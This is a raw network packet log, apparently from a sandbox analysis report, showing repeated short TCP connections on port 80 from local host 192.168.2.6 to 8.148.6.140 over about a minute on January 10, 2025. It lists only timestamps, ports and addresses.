          Jan 10, 2025 09:27:00.845443964 CET80500538.148.6.140192.168.2.6
          Jan 10, 2025 09:27:00.951116085 CET5005480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:00.958853006 CET80500548.148.6.140192.168.2.6
          Jan 10, 2025 09:27:00.959115028 CET5005480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:00.959326982 CET5005480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:00.967036009 CET80500548.148.6.140192.168.2.6
          Jan 10, 2025 09:27:01.918735027 CET80500548.148.6.140192.168.2.6
          Jan 10, 2025 09:27:01.918775082 CET80500548.148.6.140192.168.2.6
          Jan 10, 2025 09:27:01.918807030 CET5005480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:01.918843031 CET5005480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:01.932821035 CET5005480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:01.938648939 CET80500548.148.6.140192.168.2.6
          Jan 10, 2025 09:27:02.042009115 CET5005580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:02.047089100 CET80500558.148.6.140192.168.2.6
          Jan 10, 2025 09:27:02.047194004 CET5005580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:02.047360897 CET5005580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:02.052198887 CET80500558.148.6.140192.168.2.6
          Jan 10, 2025 09:27:04.460125923 CET80500558.148.6.140192.168.2.6
          Jan 10, 2025 09:27:04.460149050 CET80500558.148.6.140192.168.2.6
          Jan 10, 2025 09:27:04.462479115 CET5005580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:04.465699911 CET5005580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:04.470602036 CET80500558.148.6.140192.168.2.6
          Jan 10, 2025 09:27:04.615408897 CET5005680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:04.620678902 CET80500568.148.6.140192.168.2.6
          Jan 10, 2025 09:27:04.621799946 CET5005680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:04.622684956 CET5005680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:04.627450943 CET80500568.148.6.140192.168.2.6
          Jan 10, 2025 09:27:05.605257034 CET80500568.148.6.140192.168.2.6
          Jan 10, 2025 09:27:05.605334044 CET80500568.148.6.140192.168.2.6
          Jan 10, 2025 09:27:05.605438948 CET5005680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:05.605438948 CET5005680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:05.605515957 CET80500568.148.6.140192.168.2.6
          Jan 10, 2025 09:27:05.605565071 CET5005680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:05.713078022 CET5005680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:05.713352919 CET5005780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:05.718113899 CET80500568.148.6.140192.168.2.6
          Jan 10, 2025 09:27:05.718576908 CET80500578.148.6.140192.168.2.6
          Jan 10, 2025 09:27:05.718646049 CET5005780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:05.718764067 CET5005780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:05.723639965 CET80500578.148.6.140192.168.2.6
          Jan 10, 2025 09:27:06.569758892 CET80500578.148.6.140192.168.2.6
          Jan 10, 2025 09:27:06.571347952 CET5005780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:06.571703911 CET5005780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:06.582231045 CET80500578.148.6.140192.168.2.6
          Jan 10, 2025 09:27:06.681514025 CET5005980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:06.686328888 CET80500598.148.6.140192.168.2.6
          Jan 10, 2025 09:27:06.687339067 CET5005980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:06.688679934 CET5005980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:06.693914890 CET80500598.148.6.140192.168.2.6
          Jan 10, 2025 09:27:10.694658041 CET5005980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:10.837677956 CET5006080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:10.842823982 CET80500608.148.6.140192.168.2.6
          Jan 10, 2025 09:27:10.842966080 CET5006080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:10.843080044 CET5006080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:10.847879887 CET80500608.148.6.140192.168.2.6
          Jan 10, 2025 09:27:12.438888073 CET80500608.148.6.140192.168.2.6
          Jan 10, 2025 09:27:12.439023018 CET5006080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:12.439081907 CET80500608.148.6.140192.168.2.6
          Jan 10, 2025 09:27:12.439152002 CET80500608.148.6.140192.168.2.6
          Jan 10, 2025 09:27:12.439285994 CET5006080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:12.439285994 CET5006080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:12.444130898 CET80500608.148.6.140192.168.2.6
          Jan 10, 2025 09:27:12.557249069 CET5006180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:12.562231064 CET80500618.148.6.140192.168.2.6
          Jan 10, 2025 09:27:12.562364101 CET5006180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:12.562727928 CET5006180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:12.567559958 CET80500618.148.6.140192.168.2.6
          Jan 10, 2025 09:27:13.507354021 CET80500618.148.6.140192.168.2.6
          Jan 10, 2025 09:27:13.507391930 CET80500618.148.6.140192.168.2.6
          Jan 10, 2025 09:27:13.507426023 CET5006180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:13.507500887 CET5006180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:13.507585049 CET5006180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:13.512372017 CET80500618.148.6.140192.168.2.6
          Jan 10, 2025 09:27:13.619761944 CET5006280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:13.624622107 CET80500628.148.6.140192.168.2.6
          Jan 10, 2025 09:27:13.624702930 CET5006280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:13.624799967 CET5006280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:13.629565954 CET80500628.148.6.140192.168.2.6
          Jan 10, 2025 09:27:14.476979017 CET80500628.148.6.140192.168.2.6
          Jan 10, 2025 09:27:14.477097988 CET5006280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:14.477273941 CET5006280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:14.482192993 CET80500628.148.6.140192.168.2.6
          Jan 10, 2025 09:27:14.589415073 CET5006380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:14.594496012 CET80500638.148.6.140192.168.2.6
          Jan 10, 2025 09:27:14.594647884 CET5006380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:14.594922066 CET5006380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:14.599745035 CET80500638.148.6.140192.168.2.6
          Jan 10, 2025 09:27:18.603010893 CET5006380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:18.713355064 CET5006480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:18.718188047 CET80500648.148.6.140192.168.2.6
          Jan 10, 2025 09:27:18.718310118 CET5006480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:18.721239090 CET5006480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:18.725989103 CET80500648.148.6.140192.168.2.6
          Jan 10, 2025 09:27:19.572271109 CET80500648.148.6.140192.168.2.6
          Jan 10, 2025 09:27:19.572335005 CET5006480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:19.572670937 CET5006480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:19.577411890 CET80500648.148.6.140192.168.2.6
          Jan 10, 2025 09:27:19.699661016 CET5006580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:19.704508066 CET80500658.148.6.140192.168.2.6
          Jan 10, 2025 09:27:19.704592943 CET5006580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:19.704741955 CET5006580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:19.709593058 CET80500658.148.6.140192.168.2.6
          Jan 10, 2025 09:27:20.699805975 CET80500658.148.6.140192.168.2.6
          Jan 10, 2025 09:27:20.699898958 CET80500658.148.6.140192.168.2.6
          Jan 10, 2025 09:27:20.699927092 CET5006580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:20.699976921 CET5006580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:20.700144053 CET5006580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:20.704901934 CET80500658.148.6.140192.168.2.6
          Jan 10, 2025 09:27:20.807166100 CET5006680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:20.812105894 CET80500668.148.6.140192.168.2.6
          Jan 10, 2025 09:27:20.812248945 CET5006680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:20.812406063 CET5006680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:20.817193985 CET80500668.148.6.140192.168.2.6
          Jan 10, 2025 09:27:21.818121910 CET80500668.148.6.140192.168.2.6
          Jan 10, 2025 09:27:21.818186998 CET5006680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:21.818203926 CET80500668.148.6.140192.168.2.6
          Jan 10, 2025 09:27:21.818262100 CET5006680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:21.818367004 CET5006680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:21.823081017 CET80500668.148.6.140192.168.2.6
          Jan 10, 2025 09:27:21.931472063 CET5006780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:21.936407089 CET80500678.148.6.140192.168.2.6
          Jan 10, 2025 09:27:21.936481953 CET5006780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:21.936686993 CET5006780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:21.941526890 CET80500678.148.6.140192.168.2.6
          Jan 10, 2025 09:27:22.798325062 CET80500678.148.6.140192.168.2.6
          Jan 10, 2025 09:27:22.798466921 CET5006780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:22.798537970 CET5006780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:22.803349972 CET80500678.148.6.140192.168.2.6
          Jan 10, 2025 09:27:22.917133093 CET5006880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:22.922127008 CET80500688.148.6.140192.168.2.6
          Jan 10, 2025 09:27:22.922234058 CET5006880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:22.922439098 CET5006880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:22.927300930 CET80500688.148.6.140192.168.2.6
          Jan 10, 2025 09:27:24.454638004 CET80500688.148.6.140192.168.2.6
          Jan 10, 2025 09:27:24.454715967 CET80500688.148.6.140192.168.2.6
          Jan 10, 2025 09:27:24.455302000 CET5006880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:24.455302000 CET5006880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:24.460144997 CET80500688.148.6.140192.168.2.6
          Jan 10, 2025 09:27:24.574127913 CET5006980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:24.579113007 CET80500698.148.6.140192.168.2.6
          Jan 10, 2025 09:27:24.583391905 CET5006980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:24.583391905 CET5006980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:24.588274956 CET80500698.148.6.140192.168.2.6
          Jan 10, 2025 09:27:25.481055975 CET80500698.148.6.140192.168.2.6
          Jan 10, 2025 09:27:25.481138945 CET5006980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:25.504753113 CET5006980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:25.509608030 CET80500698.148.6.140192.168.2.6
          Jan 10, 2025 09:27:25.623071909 CET5007080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:25.628355980 CET80500708.148.6.140192.168.2.6
          Jan 10, 2025 09:27:25.628434896 CET5007080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:25.629178047 CET5007080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:25.634465933 CET80500708.148.6.140192.168.2.6
          Jan 10, 2025 09:27:26.626981020 CET80500708.148.6.140192.168.2.6
          Jan 10, 2025 09:27:26.627106905 CET80500708.148.6.140192.168.2.6
          Jan 10, 2025 09:27:26.627115965 CET5007080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:26.627329111 CET5007080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:26.627329111 CET5007080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:26.632194996 CET80500708.148.6.140192.168.2.6
          Jan 10, 2025 09:27:26.744348049 CET5007180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:26.749345064 CET80500718.148.6.140192.168.2.6
          Jan 10, 2025 09:27:26.751177073 CET5007180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:26.755108118 CET5007180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:26.760031939 CET80500718.148.6.140192.168.2.6
          Jan 10, 2025 09:27:27.606764078 CET80500718.148.6.140192.168.2.6
          Jan 10, 2025 09:27:27.606844902 CET5007180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:27.606967926 CET5007180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:27.611800909 CET80500718.148.6.140192.168.2.6
          Jan 10, 2025 09:27:27.713443041 CET5007280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:27.718389988 CET80500728.148.6.140192.168.2.6
          Jan 10, 2025 09:27:27.718466997 CET5007280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:27.718604088 CET5007280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:27.723386049 CET80500728.148.6.140192.168.2.6
          Jan 10, 2025 09:27:31.663121939 CET80500728.148.6.140192.168.2.6
          Jan 10, 2025 09:27:31.663218975 CET5007280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:31.663371086 CET80500728.148.6.140192.168.2.6
          Jan 10, 2025 09:27:31.663433075 CET5007280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:31.663497925 CET5007280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:31.668237925 CET80500728.148.6.140192.168.2.6
          Jan 10, 2025 09:27:31.784379005 CET5007380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:31.789283991 CET80500738.148.6.140192.168.2.6
          Jan 10, 2025 09:27:31.789360046 CET5007380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:31.792303085 CET5007380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:31.797044992 CET80500738.148.6.140192.168.2.6
          Jan 10, 2025 09:27:32.660099030 CET80500738.148.6.140192.168.2.6
          Jan 10, 2025 09:27:32.663598061 CET5007380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:32.663598061 CET5007380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:32.668397903 CET80500738.148.6.140192.168.2.6
          Jan 10, 2025 09:27:32.779064894 CET5007480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:32.783984900 CET80500748.148.6.140192.168.2.6
          Jan 10, 2025 09:27:32.784753084 CET5007480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:32.784753084 CET5007480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:32.789660931 CET80500748.148.6.140192.168.2.6
          Jan 10, 2025 09:27:33.676599026 CET80500748.148.6.140192.168.2.6
          Jan 10, 2025 09:27:33.676678896 CET5007480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:33.676892042 CET5007480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:33.681648016 CET80500748.148.6.140192.168.2.6
          Jan 10, 2025 09:27:33.792455912 CET5007580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:33.797343016 CET80500758.148.6.140192.168.2.6
          Jan 10, 2025 09:27:33.797425032 CET5007580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:33.797542095 CET5007580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:33.802350998 CET80500758.148.6.140192.168.2.6
          Jan 10, 2025 09:27:37.807862043 CET5007580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:37.980037928 CET5007680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:37.984904051 CET80500768.148.6.140192.168.2.6
          Jan 10, 2025 09:27:37.985040903 CET5007680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:37.990502119 CET5007680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:37.995306015 CET80500768.148.6.140192.168.2.6
          Jan 10, 2025 09:27:38.867712021 CET80500768.148.6.140192.168.2.6
          Jan 10, 2025 09:27:38.867849112 CET5007680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:38.867907047 CET5007680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:38.872689009 CET80500768.148.6.140192.168.2.6
          Jan 10, 2025 09:27:38.981077909 CET5007780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:38.985955000 CET80500778.148.6.140192.168.2.6
          Jan 10, 2025 09:27:38.986074924 CET5007780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:38.986259937 CET5007780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:38.991082907 CET80500778.148.6.140192.168.2.6
          Jan 10, 2025 09:27:39.826409101 CET80500778.148.6.140192.168.2.6
          Jan 10, 2025 09:27:39.826477051 CET5007780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:39.826668978 CET5007780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:39.831428051 CET80500778.148.6.140192.168.2.6
          Jan 10, 2025 09:27:39.932205915 CET5007880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:39.937062025 CET80500788.148.6.140192.168.2.6
          Jan 10, 2025 09:27:39.937143087 CET5007880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:39.937341928 CET5007880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:39.942121029 CET80500788.148.6.140192.168.2.6
          Jan 10, 2025 09:27:43.944619894 CET5007880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:44.057823896 CET5007980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:44.062980890 CET80500798.148.6.140192.168.2.6
          Jan 10, 2025 09:27:44.063081980 CET5007980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:44.063258886 CET5007980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:44.068155050 CET80500798.148.6.140192.168.2.6
          Jan 10, 2025 09:27:48.011719942 CET80500798.148.6.140192.168.2.6
          Jan 10, 2025 09:27:48.011838913 CET5007980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:48.024524927 CET5007980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:48.029330969 CET80500798.148.6.140192.168.2.6
          Jan 10, 2025 09:27:48.135616064 CET5008080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:48.142393112 CET80500808.148.6.140192.168.2.6
          Jan 10, 2025 09:27:48.142472029 CET5008080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:48.142606020 CET5008080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:48.148648977 CET80500808.148.6.140192.168.2.6
          Jan 10, 2025 09:27:48.995305061 CET80500808.148.6.140192.168.2.6
          Jan 10, 2025 09:27:48.995600939 CET5008080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:48.995739937 CET5008080192.168.2.68.148.6.140
          Jan 10, 2025 09:27:49.000865936 CET80500808.148.6.140192.168.2.6
          Jan 10, 2025 09:27:49.105493069 CET5008180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:49.110341072 CET80500818.148.6.140192.168.2.6
          Jan 10, 2025 09:27:49.110502958 CET5008180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:49.111843109 CET5008180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:49.116677999 CET80500818.148.6.140192.168.2.6
          Jan 10, 2025 09:27:50.095115900 CET80500818.148.6.140192.168.2.6
          Jan 10, 2025 09:27:50.095189095 CET5008180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:50.095279932 CET80500818.148.6.140192.168.2.6
          Jan 10, 2025 09:27:50.095326900 CET5008180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:50.095391989 CET80500818.148.6.140192.168.2.6
          Jan 10, 2025 09:27:50.095554113 CET5008180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:50.095712900 CET5008180192.168.2.68.148.6.140
          Jan 10, 2025 09:27:50.100536108 CET80500818.148.6.140192.168.2.6
          Jan 10, 2025 09:27:50.212862015 CET5008280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:50.217792988 CET80500828.148.6.140192.168.2.6
          Jan 10, 2025 09:27:50.217904091 CET5008280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:50.218101978 CET5008280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:50.222882986 CET80500828.148.6.140192.168.2.6
          Jan 10, 2025 09:27:51.189567089 CET80500828.148.6.140192.168.2.6
          Jan 10, 2025 09:27:51.189702988 CET80500828.148.6.140192.168.2.6
          Jan 10, 2025 09:27:51.189769030 CET5008280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:51.193830013 CET5008280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:51.306586981 CET5008380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:51.306592941 CET5008280192.168.2.68.148.6.140
          Jan 10, 2025 09:27:51.311444044 CET80500828.148.6.140192.168.2.6
          Jan 10, 2025 09:27:51.311451912 CET80500838.148.6.140192.168.2.6
          Jan 10, 2025 09:27:51.311630964 CET5008380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:51.311728954 CET5008380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:51.316555023 CET80500838.148.6.140192.168.2.6
          Jan 10, 2025 09:27:52.312535048 CET80500838.148.6.140192.168.2.6
          Jan 10, 2025 09:27:52.312588930 CET80500838.148.6.140192.168.2.6
          Jan 10, 2025 09:27:52.312602043 CET5008380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:52.312633038 CET5008380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:52.312659979 CET80500838.148.6.140192.168.2.6
          Jan 10, 2025 09:27:52.312712908 CET5008380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:52.312868118 CET5008380192.168.2.68.148.6.140
          Jan 10, 2025 09:27:52.317677021 CET80500838.148.6.140192.168.2.6
          Jan 10, 2025 09:27:52.431216955 CET5008480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:52.591917038 CET80500848.148.6.140192.168.2.6
          Jan 10, 2025 09:27:52.592047930 CET5008480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:52.592216015 CET5008480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:52.597011089 CET80500848.148.6.140192.168.2.6
          Jan 10, 2025 09:27:54.126885891 CET80500848.148.6.140192.168.2.6
          Jan 10, 2025 09:27:54.126899004 CET80500848.148.6.140192.168.2.6
          Jan 10, 2025 09:27:54.126961946 CET5008480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:54.126961946 CET5008480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:54.127089024 CET5008480192.168.2.68.148.6.140
          Jan 10, 2025 09:27:54.131841898 CET80500848.148.6.140192.168.2.6
          Jan 10, 2025 09:27:54.244395971 CET5008580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:54.249186993 CET80500858.148.6.140192.168.2.6
          Jan 10, 2025 09:27:54.249299049 CET5008580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:54.249459982 CET5008580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:54.254215002 CET80500858.148.6.140192.168.2.6
          Jan 10, 2025 09:27:55.112368107 CET80500858.148.6.140192.168.2.6
          Jan 10, 2025 09:27:55.112440109 CET5008580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:55.112545013 CET5008580192.168.2.68.148.6.140
          Jan 10, 2025 09:27:55.117306948 CET80500858.148.6.140192.168.2.6
          Jan 10, 2025 09:27:55.228255033 CET5008680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:55.233068943 CET80500868.148.6.140192.168.2.6
          Jan 10, 2025 09:27:55.233155966 CET5008680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:55.233478069 CET5008680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:55.238230944 CET80500868.148.6.140192.168.2.6
          Jan 10, 2025 09:27:56.215364933 CET80500868.148.6.140192.168.2.6
          Jan 10, 2025 09:27:56.215425968 CET5008680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:56.215848923 CET80500868.148.6.140192.168.2.6
          Jan 10, 2025 09:27:56.215859890 CET80500868.148.6.140192.168.2.6
          Jan 10, 2025 09:27:56.215887070 CET5008680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:56.215909958 CET5008680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:56.215984106 CET5008680192.168.2.68.148.6.140
          Jan 10, 2025 09:27:56.220763922 CET80500868.148.6.140192.168.2.6
          Jan 10, 2025 09:27:56.322074890 CET5008780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:56.327037096 CET80500878.148.6.140192.168.2.6
          Jan 10, 2025 09:27:56.327110052 CET5008780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:56.327219963 CET5008780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:56.332437038 CET80500878.148.6.140192.168.2.6
          Jan 10, 2025 09:27:58.822376966 CET80500878.148.6.140192.168.2.6
          Jan 10, 2025 09:27:58.822582006 CET80500878.148.6.140192.168.2.6
          Jan 10, 2025 09:27:58.822698116 CET5008780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:58.825134039 CET5008780192.168.2.68.148.6.140
          Jan 10, 2025 09:27:58.830354929 CET80500878.148.6.140192.168.2.6
          Jan 10, 2025 09:27:58.933367014 CET5008880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:58.938316107 CET80500888.148.6.140192.168.2.6
          Jan 10, 2025 09:27:58.938739061 CET5008880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:58.939017057 CET5008880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:58.943829060 CET80500888.148.6.140192.168.2.6
          Jan 10, 2025 09:27:59.794313908 CET80500888.148.6.140192.168.2.6
          Jan 10, 2025 09:27:59.794420004 CET5008880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:59.794467926 CET5008880192.168.2.68.148.6.140
          Jan 10, 2025 09:27:59.799261093 CET80500888.148.6.140192.168.2.6
          Jan 10, 2025 09:27:59.968569040 CET5008980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:59.973412991 CET80500898.148.6.140192.168.2.6
          Jan 10, 2025 09:27:59.973484039 CET5008980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:59.977205992 CET5008980192.168.2.68.148.6.140
          Jan 10, 2025 09:27:59.982012987 CET80500898.148.6.140192.168.2.6
          Jan 10, 2025 09:28:00.854729891 CET80500898.148.6.140192.168.2.6
          Jan 10, 2025 09:28:00.854856014 CET5008980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:00.854971886 CET5008980192.168.2.68.148.6.140
          Jan 10, 2025 09:28:00.859819889 CET80500898.148.6.140192.168.2.6
          Jan 10, 2025 09:28:00.962354898 CET5009080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:00.967221022 CET80500908.148.6.140192.168.2.6
          Jan 10, 2025 09:28:00.967505932 CET5009080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:00.967505932 CET5009080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:00.972579002 CET80500908.148.6.140192.168.2.6
          Jan 10, 2025 09:28:04.911849976 CET80500908.148.6.140192.168.2.6
          Jan 10, 2025 09:28:04.911871910 CET80500908.148.6.140192.168.2.6
          Jan 10, 2025 09:28:04.911884069 CET80500908.148.6.140192.168.2.6
          Jan 10, 2025 09:28:04.911998034 CET5009080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:04.912276983 CET5009080192.168.2.68.148.6.140
          Jan 10, 2025 09:28:04.917114973 CET80500908.148.6.140192.168.2.6
          Jan 10, 2025 09:28:05.031053066 CET5009180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:05.035912037 CET80500918.148.6.140192.168.2.6
          Jan 10, 2025 09:28:05.039238930 CET5009180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:05.039238930 CET5009180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:05.044023037 CET80500918.148.6.140192.168.2.6
          Jan 10, 2025 09:28:05.993217945 CET80500918.148.6.140192.168.2.6
          Jan 10, 2025 09:28:05.993228912 CET80500918.148.6.140192.168.2.6
          Jan 10, 2025 09:28:05.993292093 CET80500918.148.6.140192.168.2.6
          Jan 10, 2025 09:28:05.993295908 CET5009180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:05.993357897 CET5009180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:05.993869066 CET5009180192.168.2.68.148.6.140
          Jan 10, 2025 09:28:05.998651028 CET80500918.148.6.140192.168.2.6
          Jan 10, 2025 09:28:06.105149984 CET5009280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:06.110162020 CET80500928.148.6.140192.168.2.6
          Jan 10, 2025 09:28:06.110250950 CET5009280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:06.110570908 CET5009280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:06.115361929 CET80500928.148.6.140192.168.2.6
          Jan 10, 2025 09:28:07.663578987 CET80500928.148.6.140192.168.2.6
          Jan 10, 2025 09:28:07.663634062 CET80500928.148.6.140192.168.2.6
          Jan 10, 2025 09:28:07.663642883 CET5009280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:07.663680077 CET5009280192.168.2.68.148.6.140
          Jan 10, 2025 09:28:07.663728952 CET80500928.148.6.140192.168.2.6
